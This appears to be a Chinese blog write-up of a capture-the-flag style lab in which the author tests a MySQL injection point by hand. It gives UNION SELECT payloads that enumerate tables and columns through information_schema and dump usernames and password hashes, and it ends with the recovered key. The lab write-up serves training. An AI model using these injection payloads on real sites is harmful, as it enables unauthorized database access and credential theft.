SQL手工测试(MySQL数据库)

lubiii_2025-06-09 10:26

1.看到注入点,测试列字段数量,发现为4正常,为5出错,可知列数为5

2.找到数据库名mozhe_Discuz_StormGroup

3.查询表名?id=-1%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

得到StormGroup_member,notice

4.查询列名

?id=-1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

5.获取数据

?id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member

mozhe\356f589a7df439f6f744ff19bb8092c0

此时发现直接输入会账密错误,说明需要解码

6.将密码解码得到的结果也是始终不正确,考虑其他数据

id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member%20limit%201,1

mozhe\89f76612d6fbbeb12265a7300301f024

7.再次解密验证

8.成功啦,获得Key:mozhe69c92e07d1330df9daeaeea8738

相关推荐
陈天伟教授3 小时前
人工智能训练师认证教程(2)Python os入门教程
前端·数据库·python
Elastic 中国社区官方博客4 小时前
Elasticsearch:在分析过程中对数字进行标准化
大数据·数据库·elasticsearch·搜索引擎·全文检索
聪明努力的积极向上4 小时前
【MYSQL】字符串拼接和参数化sql语句区别
数据库·sql·mysql
代码or搬砖4 小时前
RBAC(权限认证)小例子
java·数据库·spring boot
神仙别闹4 小时前
基于QT(C++)实现学本科教务系统(URP系统)
数据库·c++·qt
2301_768350234 小时前
MySQL为什么选择InnoDB作为存储引擎
java·数据库·mysql
上海蓝色星球4 小时前
迈向智慧电网新纪元:上海蓝色星球数字孪生变电主子站系统
运维·数据库
是大芒果4 小时前
数据库表设计
数据库
哥哥还在IT中4 小时前
MySQL order by 如何优化
数据库·mysql
积跬步,慕至千里5 小时前
postgre数据库大批量快速导出方法总结
数据库·postgres
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05BongoCat - 跨平台键盘猫动画工具06Neo4j(一) - Neo4j安装教程(Windows)07【AutoGLM部署】本地私有化部署AI手机Agent08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser10Open-AutoGLM Windows 安装部署教程